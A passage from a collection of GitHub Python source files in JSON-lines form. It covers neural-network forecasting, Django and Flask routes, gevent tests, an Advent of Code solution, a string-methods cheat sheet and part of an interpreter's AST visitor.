properly\")\n","repo_name":"cuberiser/speedcuber-py","sub_path":"utilities/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"2222066281","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom models import BPNN\nfrom data_process import sequence_create, sequence_split, sequence_load, sequence_aug\nfrom metrics.regression_metrics import get_mae, get_mse, get_mape, get_rmse, get_r2\n\"\"\"\n方法:BPNN\n策略:单模型多输出\n\"\"\"\n\nif __name__ == '__main__':\n # 设置随机种子\n np.random.seed(0)\n\n # == == == == == == == == == 制造模型需要的数据 == == == == == == == == ==\n\n # 加载数据\n data_origin = sequence_load.load_data(' ')\n train_data, test_data = sequence_split.train_test_split(data_origin)\n # print(train_data.shape)\n\n # 归一化\n train_data_normalized, scaler = sequence_aug.normalize(train_data.reshape(-1, 1), method='-1-1')\n test_data_normalized = scaler.transform(test_data.reshape(-1, 1))\n # print(train_data_normalized[:5])\n\n # 制造训练集序列及对应标签\n \"\"\"\n 【注】\n\n 1. 输入时间窗步长一般大于预测步长\n 2. 若利用训练集最后的时间窗预测测试集初始部分,则必须满足 输入步长>预测步长,以防止训练集渗入测试集作弊\n 3. 故本代码训练集最后一个时间窗步长数据不参与训练 \n \"\"\"\n history_size = 24 # 输入时间窗步长\n predict_size = 24 # 预测步长\n\n # 训练序列最后一个时间窗步长数据不参与训练\n train_real_normalized = train_data_normalized[:-history_size]\n\n # 测试序列前面增加训练序列的最后一个时间窗步长数据\n test_real_normalized = np.concatenate(\n (train_data_normalized[-history_size:], test_data_normalized))\n\n train_inout_seq = sequence_create.create_inout_train(train_real_normalized, history_size, predict_size)\n # train_inout_seq = shuffle(train_inout_seq, random_state=1) # 每次运行 shuffle 函数得到打乱后的结果都是相同的\n train_x, train_y = train_inout_seq[:, :-predict_size], train_inout_seq[:, -predict_size:]\n test_inout_seq = sequence_create.create_inout_test(test_real_normalized, history_size, predict_size)\n test_x, test_y = test_inout_seq[:, :-predict_size], test_inout_seq[:, -predict_size:]\n\n # 样本数量\n train_data_num = len(train_x)\n test_data_num = len(test_x) # 数量应该等于len(train_data_normalized)\n\n # == == == == == == == == == 搭建模型 == == == == == == == == ==\n\n # 实例化网络模型\n bp_mlp = BPNN.bp_model()\n\n # == == == == == == == == == 模型训练 == == == == == == == == ==\n bp_fit = bp_mlp.fit(train_x, train_y)\n\n # == == == == == == == == == 模型预测 == == == == == == == == ==\n # 训练集\n train_predict = bp_fit.predict(train_x)\n # print(train_predict)\n train_predict = scaler.inverse_transform(train_predict.reshape(-1, 1)) # 逆归一化\n # 测试集\n test_predict = bp_fit.predict(test_x)\n test_predict = scaler.inverse_transform(test_predict.reshape(-1, 1)) # 逆归一化\n\n # == == == == == == == == == == 数据索引 == == == == == == == == == ==\n\n data_number_index = np.arange(0, len(data_origin), 1) # 数字索引,非时间索引\n test_number_index = data_number_index[len(data_origin) - test_data_num*predict_size:]\n output = pd.DataFrame(test_predict)\n output.to_csv(' ')\n\n # == == == == == == == == == 预测误差评价指标 == == == == == == == == ==\n\n # 平均绝对误差(MAE)\n print('---------评估指标--------')\n mae = get_mae(data_origin[test_number_index], test_predict)\n print('MAE:{}'.format(mae))\n # 平均绝对百分比误差(MAPE)\n mape = get_mape(data_origin[test_number_index], test_predict) * 100\n print('MAPE:{}%'.format(mape))\n # 均方误差(MSE)\n mse = get_mse(data_origin[test_number_index], test_predict)\n print('MSE:{}'.format(mse))\n # 均方根误差(RMSE)\n rmse = get_rmse(data_origin[test_number_index], test_predict)\n print('RMSE:{}'.format(rmse))\n # 判别系数R^2\n r2 = get_r2(data_origin[test_number_index], test_predict)\n print('R^2:{}'.format(r2))\n\n # == == == == == == == == == == 绘图 == == == == == == == == == ==\n\n plt.plot(test_number_index, data_origin[test_number_index], 'b', label='real')\n plt.plot(test_number_index, test_predict, 'y-', label='prediction')\n plt.legend(loc='best')\n plt.grid(True)\n plt.show()\n","repo_name":"ahu-dsp/Top-oil-temperature-forcast-code","sub_path":"neural networks/algorithms/bpnn_multiple_outputs.py","file_name":"bpnn_multiple_outputs.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70937276477","text":"from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom.views import (AccountList,AccountUpdate,AccountDelete,AccountDetail,\nAccountCreate)\n\n\n\nurlpatterns = [\n url(r'^$', AccountList.as_view(), name='account'),\n url(r'^(?P\\d+)/$', AccountDetail.as_view(), name='detail'),\n url(r'^edit/(?P\\d+)/$', AccountUpdate.as_view(), name='edit'),\n url(r'^delete/(?P\\d+)/$', AccountDelete.as_view(), name='delete'),\n url(r'^create/$', AccountCreate.as_view(), name='create'),\n\n]\n","repo_name":"kais2503/Gsource","sub_path":"src/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"70447536316","text":"import gevent\nimport socket\nimport unittest\nimport msgpack\n\nfrom circus import g\n\n\ndef get_free_ports(num, host=None):\n if not host:\n host = '127.0.0.1'\n sockets = []\n ret = []\n for i in xrange(num):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((host, 0))\n ret.append(s.getsockname()[1])\n sockets.append(s)\n for s in sockets:\n s.close()\n return ret\n\n\nclass DealerTest(unittest.TestCase):\n def test_simple(self):\n port, = get_free_ports(1)\n router = g.Router(port, api=lambda x: x)\n dealer = g.Dealer(port)\n self.assertEqual(dealer.send('hi'), 'hi')\n\n def test_timeout(self):\n def sleepy(x):\n gevent.sleep(0.2)\n return x\n port, = get_free_ports(1)\n router = g.Router(port, api=sleepy)\n dealer = g.Dealer(port, timeout=0.1)\n self.assertRaises(g.TimeoutException, dealer.send, 'hi')\n gevent.sleep(0.3)\n\n\nclass PushTest(unittest.TestCase):\n def test_simple(self):\n port, = get_free_ports(1)\n class C(object):\n def __call__(self, message):\n self.message = message\n return 'foo'\n api = C()\n pull = g.Pull(port, api=api)\n push = g.Push(port)\n self.assertEqual(push.send('hi'), None)\n gevent.sleep(0.001)\n self.assertEqual(api.message, 'hi')\n\n\nclass APITest(unittest.TestCase):\n def test_dealer(self):\n class Echo(object):\n def remote_echo(self, message):\n return message\n port, = get_free_ports(1)\n server = g.APIServer(g.Router(port), api=Echo())\n client = g.APIClient(g.Dealer(port))\n self.assertEqual(client.echo('hi'), 'hi')\n\n def test_push(self):\n class Metrics(object):\n def __init__(self):\n self.x = 0\n def remote_incr(self, delta):\n self.x += delta\n metrics = Metrics()\n port, = get_free_ports(1)\n server = g.APIServer(g.Pull(port), api=metrics)\n client = g.APIClient(g.Push(port))\n self.assertEqual(client.incr(3), None)\n gevent.sleep(0.001)\n self.assertEqual(metrics.x, 3)\n del client\n gevent.sleep(0.001)\n\n","repo_name":"cablehead/circus","sub_path":"circus/test/test_g.py","file_name":"test_g.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23274070946","text":"import os\nimport argparse\nimport scipy.stats as st\n\nfrom .. import params as P\nfrom . import utils\n\n# This is a utility script that takes a path to a desired result folder, reads the results saved in this\n# folder, and then computes convergence epochs for a given metric used in the training process.\ndef run_dispconv(path, crit, lb, seeds, ci_levels, convthresholds):\n\tfor ct in convthresholds:\n\t\tprint(str(100*ct) + \"% CONVERGENCE THRESHOLD\" )\n\t\tprint(\"ITER, RESULT\")\n\t\tvalues = []\n\t\tfor id in seeds:\n\t\t\tcheckpoint_folder = os.path.join(path, 'iter' + str(id), 'checkpoints')\n\t\t\tcheckpoint_list = utils.get_checkpoint_list(checkpoint_folder)\n\t\t\tcheckpoint_id = max(checkpoint_list)\n\t\t\tcheckpoint_file_path = os.path.join(checkpoint_folder, \"checkpoint\" + str(checkpoint_id) + \".pt\")\n\t\t\tloaded_checkpoint = utils.load_dict(checkpoint_file_path)\n\t\t\tseries = loaded_checkpoint['val_result_data'][loaded_checkpoint['crit_names'].index(crit)]\n\t\t\tbest_res = max(series)\n\t\t\tconv_epoch = 0\n\t\t\thb = not lb\n\t\t\tfor i in range(len(series)):\n\t\t\t\tif utils.is_converged(series[i], best_res, ct, hb):\n\t\t\t\t\tconv_epoch = i\n\t\t\t\t\tbreak\n\t\t\tvalues.append(conv_epoch)\n\t\t\tprint(str(id) + \", \" + str(conv_epoch))\n\t\tavg = sum(values)/len(values)\n\t\tse = st.sem(values)\n\t\tprint(\"AVG, \" + str(avg))\n\t\tfor ci_lvl in ci_levels:\n\t\t\tci = st.t.interval(ci_lvl, len(values) - 1, loc=avg, scale=se)\n\t\t\tci_str = \"+/- \" + str((ci[1] - ci[0])/2)\n\t\t\tprint(str(ci_lvl*100) + \"% CI, \" + ci_str)\n\t\t\t\n\nif __name__ == '__main__':\n\t# Parse command line arguments\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--path', default=P.DEFAULT_DISPCONV_PATH, help=\"Path to the csv file you want to examine.\")\n\tparser.add_argument('--crit', default=P.DEFAULT_CRIT, help=\"Name of criterion you want to evaluate.\")\n\tparser.add_argument('--lb', action='store_true', default=P.DEFAULT_DISPCONV_LB, help=\"Pass this flag if you want to evaluate a lower-is-better criterion (False by default).\")\n\tparser.add_argument('--seeds', nargs='*', default=P.DEFAULT_SEEDS, type=int, help=\"The RNG seeds of the experiments you want to examine.\")\n\tparser.add_argument('--ci', nargs='*', default=P.DEFAULT_CI_LEVELS, type=float, help=\"Confidence interval levels you want to report.\")\n\tparser.add_argument('--convthresholds', nargs='*', default=P.DEFAULT_CONVTHRESHOLDS, type=float, help=\"Convergence threshold levels you want to report.\")\n\targs = parser.parse_args()\n\t\n\trun_dispconv(path=args.path, crit=args.crit, lb=args.lb, seeds=args.seeds, ci_levels=args.ci, convthresholds=args.convthresholds)","repo_name":"GabrieleLagani/HebbianLearning","sub_path":"neurolab/utils/dispconv.py","file_name":"dispconv.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"96"} +{"seq_id":"41394777119","text":"from main import Circuit\n\ninout = {\n 'inputs': ['a','b','c','d'],\n 'outputs': ['out', 'out1']\n}\n\nmyCirc = Circuit(inout)\nmyCirc.addANDgate('node1', ['a','b'])\nmyCirc.addANDgate('node2', ['c','d'])\nmyCirc.addORgate('out1', ['node1', 'node2'])\nmyCirc.addANDgate('out2', ['node1', 'node2'])\n\n\ninputs = [[1,1,1,1],[1,0,0,1],[0,0,1,1],[1,0,1,0],[1,0,0,0]]\n\nresult = myCirc.Run(inputs, ['out1','out2'], time_step = 5, order=['a','b','c','d'])\n#print(result)\n#print(myCirc.result)\nmyCirc.plot()\n","repo_name":"alifele/Python","sub_path":"PyGic/source_code/example1.py","file_name":"example1.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20588947915","text":"# Creación de una cadena\nstring = \"Hola, mundo\"\n\n# Obtener la longitud de la cadena\nlength = len(string)\n# Resultado: 11\n\n# Acceder a caracteres individuales\nchar = string[0]\n# Resultado: \"H\"\n\n# Rebanado (slicing) de cadenas\nsubstring = string[0:4]\n# Resultado: \"Hola\"\n\n# Concatenación de cadenas\nconcatenated = string + \"!\"\n# Resultado: \"Hola, mundo!\"\n\n# Repetición de cadenas\nrepeated = string * 3\n# Resultado: \"Hola, mundoHola, mundoHola, mundo\"\n\n# Buscar y reemplazar\nreplaced = string.replace(\"mundo\", \"Python\")\n# Resultado: \"Hola, Python\"\n\n# Convertir a mayúsculas y minúsculas\nuppercase = string.upper()\n# Resultado: \"HOLA, MUNDO\"\nlowercase = string.lower()\n# Resultado: \"hola, mundo\"\n\n# Eliminar espacios en blanco al principio y al final\nstripped = \" Cadena con espacios \".strip()\n# Resultado: \"Cadena con espacios\"\n\n# Dividir una cadena en una lista de subcadenas\nparts = string.split(\",\")\n# Resultado: [\"Hola\", \" mundo\"]\n\n# Unir una lista de subcadenas en una cadena\njoined = \"-\".join(parts)\n# Resultado: \"Hola- mundo\"\n\n# Buscar la posición de una subcadena\nindex = string.index(\"mundo\")\n# Resultado: 6\n\n# Comprobar si una cadena comienza o termina con una subcadena\nstartsWith = string.startswith(\"Hola\")\n# Resultado: True\nendsWith = string.endswith(\"mundo\")\n# Resultado: True\n\n# Comprobar si la cadena contiene solo caracteres alfabéticos o numéricos\nisAlphaNumeric = string.isalnum()\n# Resultado: False\n\n# Comprobar si la cadena contiene solo caracteres alfabéticos\nisAlpha = string.isalpha()\n# Resultado: False\n\n# Contar ocurrencias de una subcadena en la cadena\ncount = string.count(\"o\")\n# Resultado: 2\n\n# Formateo de cadenas\nformatted = \"Hola, {}!\".format(\"Python\")\n# Resultado: \"Hola, Python!\"\n\n# F-strings (cadenas formateadas)\nname = \"Python\"\nformatted = f\"Hola, {name}!\"\n# Resultado: \"Hola, Python!\"\n\n# Remover y reemplazar espacios en blanco\nstripped = \" Cadena con espacios \".strip()\nreplaced = \"Texto con espacios\".replace(\" \", \"-\")\n\n# Partir en líneas\nlines = \"Línea 1\\nLínea 2\".split(\"\\n\")\n\n# Verificar si la cadena contiene una subcadena\ncontains = \"Python\" in string\n# Resultado: False\n\n# Obtener el código Unicode de un carácter\nunicode = ord(\"A\")\n# Resultado: 65\n\n# Convertir código Unicode a carácter\nchar = chr(65)\n# Resultado: \"A\"\n","repo_name":"Osmait/Practice-in-programin-language","sub_path":"Python/algoritms/basic/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"38117749137","text":"from flask import Blueprint, request\nfrom . import db\nfrom .models import Jumia\nfrom flask_cors import CORS\n\napi = Blueprint('api', __name__)\n\nCORS(api)\n\n# Endpoint to query db\n@api.route('/query_db', methods=['POST'], strict_slashes=False)\ndef query_db():\n name = request.json['input']\n\n products_list = Jumia.query.all()\n products = []\n\n for product in products_list:\n if name.lower() in product.name.lower():\n products.append({'store': 'Jumia', 'name': product.name, 'price': product.price, \n 'product_url': product.product_url, 'img_url': product.img_url})\n \n\n return {'products' : products} \n\n# Endpoint to update db\n@api.route('/add_products', methods=['POST'])\ndef add_products():\n product_data = request.get_json()\n\n new_products = Jumia(category=product_data['category'], name=product_data['name'], price=product_data['price'], \n product_url=product_data['product_url'], img_url=product_data['img_url'])\n\n db.session.add(new_products)\n db.session.commit\n\n return 'Done',201\n\n# Endpoint to Get Products from db\n@api.route('/products', methods=['GET'])\ndef product():\n products_list = Jumia.query.all()\n products = []\n\n for product in products_list:\n products.append({'store': 'Jumia', 'name': product.name, 'price': product.price, \n 'product_url': product.product_url, 'img_url': product.img_url})\n \n\n return {'products' : products}","repo_name":"charbelMK/price_comparison_website","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73035283835","text":"#!/usr/bin/env python3\n\nimport math\n\ninput = \"../input/2020/day13.txt\"\n\nwith open(input) as file:\n now = int(file.readline())\n buses = [int(b) for b in filter(\n lambda b: not b.startswith('x'), file.readline().split(','))]\nfirst = 1_000_000_000\nbus = 0\nfor b in buses:\n next = ((now // b) + 1) * b\n if next < first:\n first = next\n bus = b\n\nprint(\"Part 1:\", (first - now) * bus)\n\n\nwith open(input) as file:\n file.readline()\n buses = list(enumerate(file.readline().split(',')))\n buses = [(-i, int(b))\n for i, b in filter(lambda b: not b[1].startswith('x'), buses)]\n\n\ndef mul_inv(a, b):\n b0 = b\n x0 = 0\n x1 = 1\n while a > 1:\n q = a // b\n t = b\n b = a % b\n a = t\n t = x0\n x0 = x1 - q * x0\n x1 = t\n if x1 < 0:\n x1 += b0\n return x1\n\n\ndef part2(buses):\n prod = math.prod([b for i, b in buses])\n sum = 0\n\n for i, b in buses:\n p = prod // b\n sum += i * mul_inv(p, b) * p\n\n return sum % prod\n\n\nprint(\"Part 2:\", part2(buses))\n","repo_name":"bpa/advent-of-code","sub_path":"2020/script/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70960464957","text":"import pyscannerbit.scan as sb\nimport matplotlib.pyplot as plt\n\n# Test function\ndef test_logl(x,y,z):\n return -0.5*( (x-10)**2 + (y-15)**2 + (z+3)**2 ) # fitness function to maximise (log-likelihood)\n\n# Override some scanner settings (this is a little ugly for now)\n# Can make it a little nicer with defaultdict and some recursion\nfrom collections import defaultdict\ndef rec_dd():\n return defaultdict(rec_dd)\nsettings = rec_dd() # Uses a new dict as default value when accessing non-existant keys\nsettings[\"Scanner\"][\"scanners\"][\"multinest\"] = {\"tol\": 0.5, \"nlive\": 500} # Configured for quick and dirty scan \n\n# Create scan manager object\nmyscan = sb.Scan(test_logl, bounds=[[1., 40.]] * 3, prior_types=[\"log\", \"flat\", \"log\"], scanner=\"multinest\", settings=settings)\nmyscan.scan()\n\n# Retrieve h5py group object, augmented with some helpful routines\nhdf5 = myscan.get_hdf5()\n\n# Variable names always match the ones used in \"loglike\"\nprint(hdf5.get_param_names())\n\n# Best-fit parameters\nprint(hdf5.get_best_fit(\"x\"))\nprint(hdf5.get_best_fit(\"y\"))\nprint(hdf5.get_best_fit(\"z\"))\nprint(hdf5.get_min_chi_squared())\n\n# np.array of parameter\nprint(hdf5.get_param(\"z\"))\nprint(hdf5.get_loglike())\n\n# Plot pairs of parameters\nhdf5.make_plot(\"x\", \"y\")\nhdf5.make_plot(\"x\", \"LogLike\")\n\n# Plot profile likelihood (requires an axis)\nfig = plt.figure(figsize=(12,4))\nax = fig.add_subplot(121)\nhdf5.plot_profile_likelihood(ax,\"x\",\"y\")\nax = fig.add_subplot(122)\nhdf5.plot_profile_likelihood(ax,\"x\",\"z\")\nplt.tight_layout()\nfig.savefig(\"scan_object_test_logl.png\")\n\n# This is still an HDF5-like object (with the root being the group containing the datasets for this scan) \n# e.g., you can do\nprint(hdf5[\"default::x\"])\n\n","repo_name":"bjfar/pyscannerbit","sub_path":"tests/scan_object_test.py","file_name":"scan_object_test.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"22599553340","text":"import zai.ast_nodes as ast_nodes\nfrom zai.tokens import TokType\nfrom zai.internal_error import InternalRuntimeError\nfrom zai.env import EnvironmentStack, Scope\nfrom zai.lexer import Lexer\nfrom zai.parse import Parser\nfrom zai.utils import is_truthy, read_module_contents\nfrom zai.objects import (\n FloatObject,\n ObjectType,\n BoolObject,\n NilObject,\n IntObject,\n FuncObject,\n StringObject,\n ReturnObject,\n ClassDefObject,\n ClassInstanceObject,\n ContinueObject,\n BreakObject,\n ArrayObject,\n ModuleObject,\n)\n\n\nclass Visitor:\n def __init__(self, environment):\n \"\"\"\n Class implementing the visitor pattern which is used to evaluate\n language structures.\n \"\"\"\n self.env = environment\n\n def visit(self, ast_root):\n \"\"\"\n Main entry point for all AST roots.\n \"\"\"\n return ast_root.accept(self)\n\n def visit_program(self, node):\n for stmnt in node.stmnts:\n ret_val = stmnt.accept(self)\n\n if ret_val is not None and ret_val.obj_type in [\n ObjectType.RETURN,\n ObjectType.BREAK,\n ObjectType.CONTINUE,\n ]:\n if ret_val.obj_type == ObjectType.RETURN:\n msg = '\"return\" statement not used outside of a function or class' \"method!\"\n raise InternalRuntimeError(msg)\n elif ret_val.obj_type == ObjectType.BREAK:\n msg = '\"break\" statement not used within a loop or a switch block!'\n raise InternalRuntimeError(msg)\n elif ret_val.obj_type == ObjectType.CONTINUE:\n msg = '\"continue\" statement not used within a loop!'\n raise InternalRuntimeError(msg)\n # else:\n # return ret_val\n\n def visit_float(self, node):\n return FloatObject(node.val)\n\n def visit_int(self, node):\n return IntObject(node.val)\n\n def visit_symbol(self, node):\n # Retrieve symbol from env\n curr_scope = self.env.peek()\n symbol_val = curr_scope.get_variable(node.val)\n\n if symbol_val is None:\n err_msg = 'Variable \"{}\" is not defined!.'.format(node.val)\n raise InternalRuntimeError(err_msg)\n else:\n return symbol_val\n\n def visit_string(self, node):\n return StringObject(node.val)\n\n def visit_bracket(self, node):\n return node.expr.accept(self)\n\n def visit_bool(self, node):\n if node.val == TokType.TRUE:\n return BoolObject(True)\n else:\n return BoolObject(False)\n\n def visit_arith(self, node):\n # Evaluate left and right sides\n left = node.left.accept(self)\n right = node.right.accept(self)\n\n # Perform actions depeding on type\n if node.op == TokType.PLUS:\n return left + right\n elif node.op == TokType.MINUS:\n return left - right\n elif node.op == TokType.MUL:\n return left * right\n elif node.op == TokType.DIV:\n return left / right\n\n def visit_logic(self, node):\n left = node.left.accept(self)\n right = node.right.accept(self)\n\n # >\n if node.op == TokType.AND:\n return left & right\n # >=\n elif node.op == TokType.OR:\n return left | right\n\n def visit_relop(self, node):\n left = node.left.accept(self)\n right = node.right.accept(self)\n\n # >\n if node.op == TokType.GT:\n return left > right\n # >=\n elif node.op == TokType.GTE:\n return left >= right\n # <\n elif node.op == TokType.LT:\n return left < right\n # <=\n elif node.op == TokType.LTE:\n return left <= right\n\n def visit_eq(self, node):\n left = node.left.accept(self)\n right = node.right.accept(self)\n\n if node.op == TokType.EQ:\n return left == right\n elif node.op == TokType.NEQ:\n return left != right\n\n def visit_unary(self, node):\n result = node.value.accept(self)\n if node.op == TokType.MINUS:\n return -result\n elif node.op == TokType.BANG:\n return ~result\n\n def visit_if(self, node):\n # Evaluate each condition and execute block if it is true\n for condition in node.condition_blocks:\n cond_value = condition.test_condition.accept(self)\n if is_truthy(cond_value):\n return condition.body.accept(self)\n\n if node.else_block is not None:\n return node.else_block.accept(self)\n\n def visit_while(self, node):\n cond_value = node.condition.accept(self)\n while is_truthy(cond_value):\n # Detect any usage of return\n ret_val = node.body.accept(self)\n if ret_val is not None:\n # Exit loop early using return\n if ret_val.obj_type == ObjectType.BREAK:\n return\n # There is no need to do anything here. We need to reevaluate the test\n # condition for the loop.\n elif ret_val.obj_type == ObjectType.CONTINUE:\n continue\n # \"return\" value is floated up\n else:\n return ret_val\n cond_value = node.condition.accept(self)\n\n def visit_print(self, node):\n print_value = node.expr.accept(self)\n print(str(print_value))\n\n def _replace_assign_local(self, name, value):\n if isinstance(name, ast_nodes.SymbolNode):\n value = value.accept(self)\n scope = self.env.peek()\n\n if scope.get_variable(name.val) is None:\n scope.initialize_variable(name.val, value)\n else:\n msg = \"Variable {} is not initialized!\".format(name.val)\n InternalRuntimeError(msg)\n elif isinstance(name, ast_nodes.ArrayAccessNode):\n pass\n\n def _replace_assign_call(self, name, val):\n pass\n\n def _replace_assign_nested(self, name, val):\n pass\n\n def visit_replace_assign(self, node):\n symbol_namespace = None\n symbol_name = None\n new_value = node.value.accept(self)\n if node.symbol_path is not None:\n symbol_namespace = node.symbol_path.accept(self)\n else:\n symbol_namespace = self.env.peek()\n\n if isinstance(node.symbol_name, ArrayAccessNode):\n symbol_name = node.symbol_name.array_name.val\n array_index = node.symbol_name.array_pos.accept(self)\n if array_index.obj_type != ObjectType.INT:\n err_msg = 'Array cannot be \"{}\" !'.format(array_index.obj_type)\n raise InternalRuntimeError(err_msg)\n\n array_instance = symbol_namespace.get_variable(symbol_name)\n if array_instance is None:\n err_msg = ('The array \"{}\" does not exist within the current' \"environment!\").format(symbol_name)\n raise InternalRuntimeError(err_msg)\n else:\n if array_index.value < array_instance.size:\n array_instance.elements[array_index.value] = new_value\n else:\n err_msg = '\"{}\" exceeds the length of the array \"{}\"!'.format(array_index.value, symbol_name)\n raise InternalRuntimeError(err_msg)\n else:\n symbol_name = node.symbol_name.val\n if isinstance(symbol_namespace, Scope):\n status = symbol_namespace.replace_variable(symbol_name, new_value)\n if status is False:\n err_msg = ('Variable \"{}\" cannot be reasigned because it has not' \"been initialized!\").format(\n symbol_name\n )\n raise InternalRuntimeError(err_msg)\n elif symbol_namespace.obj_type in [\n ObjectType.MODULE,\n ObjectType.CLASS_INSTANCE,\n ]:\n status = symbol_namespace.namespace.replace_variable(symbol_name, new_value)\n if status is False:\n err_msg = ('Variable \"{}\" cannot be reasigned because it has not' \"been initialized!\").format(\n symbol_name\n )\n raise InternalRuntimeError(err_msg)\n\n def _new_assign_local(self, name, value):\n scope = self.env.peek()\n\n if not scope.is_initialized(name.val):\n value = value.accept(self)\n scope.initialize_variable(name.val, value)\n else:\n # TODO: Raise Runtime Error\n print(\"Variable abc is already initialized\")\n\n def _new_assign_call(self):\n # TODO: Runtime Error\n print(\"Cannot assign to function call\")\n\n def _new_assign_nested(self, path, name, value):\n symbol_path = path.accept(self)\n if isinstance(symbol_path, Scope):\n symbol_path.initialize_variable(name.val, value)\n elif symbol_path.obj_type in [ObjectType.MODULE, ObjectType.CLASS_INSTANCE]:\n symbol_path.namespace.initialize_variable(name.val, value)\n\n def visit_new_assign(self, node):\n if isinstance(node.name, ast_nodes.CallNode):\n return self._new_assign_call()\n elif isinstance(node.name, (ast_nodes.SymbolNode, ast_nodes.ArrayAccessNode)):\n if node.path is None:\n self._new_assign_local(node.name, node.value)\n else:\n self._new_assign_nested(node.path, node.name, node.value)\n else:\n print(\"This should not happen.\")\n\n def visit_scope_block(self, node):\n # Create a new scope to evaluate the current block in\n parent_env = self.env.peek()\n self.env.enter_scope(parent_env)\n for stmnt in node.stmnts:\n ret_val = stmnt.accept(self)\n # Bubble up any flow statements\n if ret_val is not None and ret_val.obj_type in [\n ObjectType.RETURN,\n ObjectType.BREAK,\n ObjectType.CONTINUE,\n ]:\n self.env.exit_scope()\n return ret_val\n\n self.env.exit_scope()\n\n def visit_switch(self, node):\n # Evaluate the condition used for testing all cases\n test_cond = node.switch_cond.accept(self)\n\n # Find the index of the first switch case which is true.\n start_case_idx = None\n for idx, switch_case in enumerate(node.switch_cases):\n case_cond = switch_case[0].accept(self)\n if is_truthy(case_cond == test_cond):\n start_case_idx = idx\n break\n\n # Execute all switch cases after that until we encounter a \"break\" keyword\n # or a \"return\"/\"continue\" keywords.\n for _, case_body in node.switch_cases[start_case_idx:]:\n ret_val = case_body.accept(self)\n if ret_val is not None:\n if ret_val.obj_type == ObjectType.BREAK:\n return\n else:\n return ret_val\n\n # Execute the default case if it is provided.\n if node.default_case is not None:\n return node.default_case.accept(self)\n\n def visit_func_def(self, node):\n curr_scope = self.env.peek()\n # Register the function in the current frame\n curr_scope.initialize_variable(node.name, FuncObject(node.name, node.args, node.body, curr_scope))\n\n def visit_class_def(self, node):\n \"\"\"\n Keyword Arguments:\n node -- Class definition node\n \"\"\"\n curr_scope = self.env.peek()\n # Register the class in the scope\n curr_scope.initialize_variable(node.class_name, ClassDefObject(node.class_name, node.class_methods))\n\n def __run_native_function(self, func_object, call_args):\n if func_object.arity != len(call_args):\n raise InternalRuntimeError(\n \"Function '{}' accepts only {} arguments but {} were given\".format(\n func_object.name, func_object.arity, len(call_args)\n )\n )\n\n evaluated_args = list()\n for arg in call_args:\n val = arg.accept(self)\n evaluated_args.append(val)\n\n # Using the \"*\" operator will destructure the list of evaluated internal object\n # arguments into the arguments which the function accepts.\n return func_object.body(*evaluated_args)\n\n def __run_internal_function(self, func_object, call_args):\n \"\"\"\n Runs the function represented by func_object. The arguments passed are supplied\n by the call_args in the form of a list.\n \"\"\"\n # Evaluate the arguments\n arg_values = list()\n for arg in call_args:\n val = arg.accept(self)\n arg_values.append(val)\n\n if len(arg_values) != func_object.arity:\n msg = 'function \"{}\" accepts only {} arguments but {} were given!'.format(\n func_object.name,\n func_object.arity,\n len(arg_values),\n )\n raise InternalRuntimeError(msg)\n\n if func_object.obj_type == ObjectType.FUNC:\n # Create a new scope\n self.env.enter_scope(func_object.env)\n elif func_object.obj_type == ObjectType.CLASS_METHOD:\n self.env.enter_scope(func_object.class_env)\n self.env.peek().initialize_variable(\"this\", func_object.class_env)\n\n # Add arguments to the current environment\n for arg_pair in zip(func_object.args, arg_values):\n self.env.peek().initialize_variable(arg_pair[0].lexeme, arg_pair[1])\n\n for stmnt in func_object.body:\n ret_val = stmnt.accept(self)\n if ret_val is not None and ret_val.obj_type in [\n ObjectType.RETURN,\n ObjectType.BREAK,\n ObjectType.CONTINUE,\n ]:\n if ret_val.obj_type == ObjectType.RETURN:\n return ret_val\n elif ret_val.obj_type == ObjectType.BREAK:\n msg = '\"break\" statement not used within a loop or a switch block!'\n raise InternalRuntimeError(msg)\n elif ret_val.obj_type == ObjectType.CONTINUE:\n msg = '\"continue\" statement not used within a loop!'\n raise InternalRuntimeError(msg)\n return None\n\n def visit_call(self, node):\n call_object = node.object_name.accept(self)\n\n # Case of function object\n if call_object.obj_type in [ObjectType.FUNC, ObjectType.CLASS_METHOD]:\n ret_val = self.__run_internal_function(call_object, node.call_args)\n self.env.exit_scope()\n if ret_val is None or ret_val.value is None:\n return NilObject()\n else:\n return ret_val.value\n\n elif call_object.obj_type == ObjectType.NATIVE_FUNC:\n return self.__run_native_function(call_object, node.call_args)\n\n elif call_object.obj_type == ObjectType.CLASS_DEF:\n instance_ptr = ClassInstanceObject(call_object.class_name, call_object.class_methods)\n # Enter new scope to register \"this\" namespace\n self.env.enter_scope(instance_ptr.namespace)\n self.env.peek().initialize_variable(\"this\", instance_ptr.namespace)\n\n class_constructor = instance_ptr.get_field(\"constructor\")\n if class_constructor is None and len(node.call_args) != 0:\n raise InternalRuntimeError(\n (\n \"Class '{}' does not 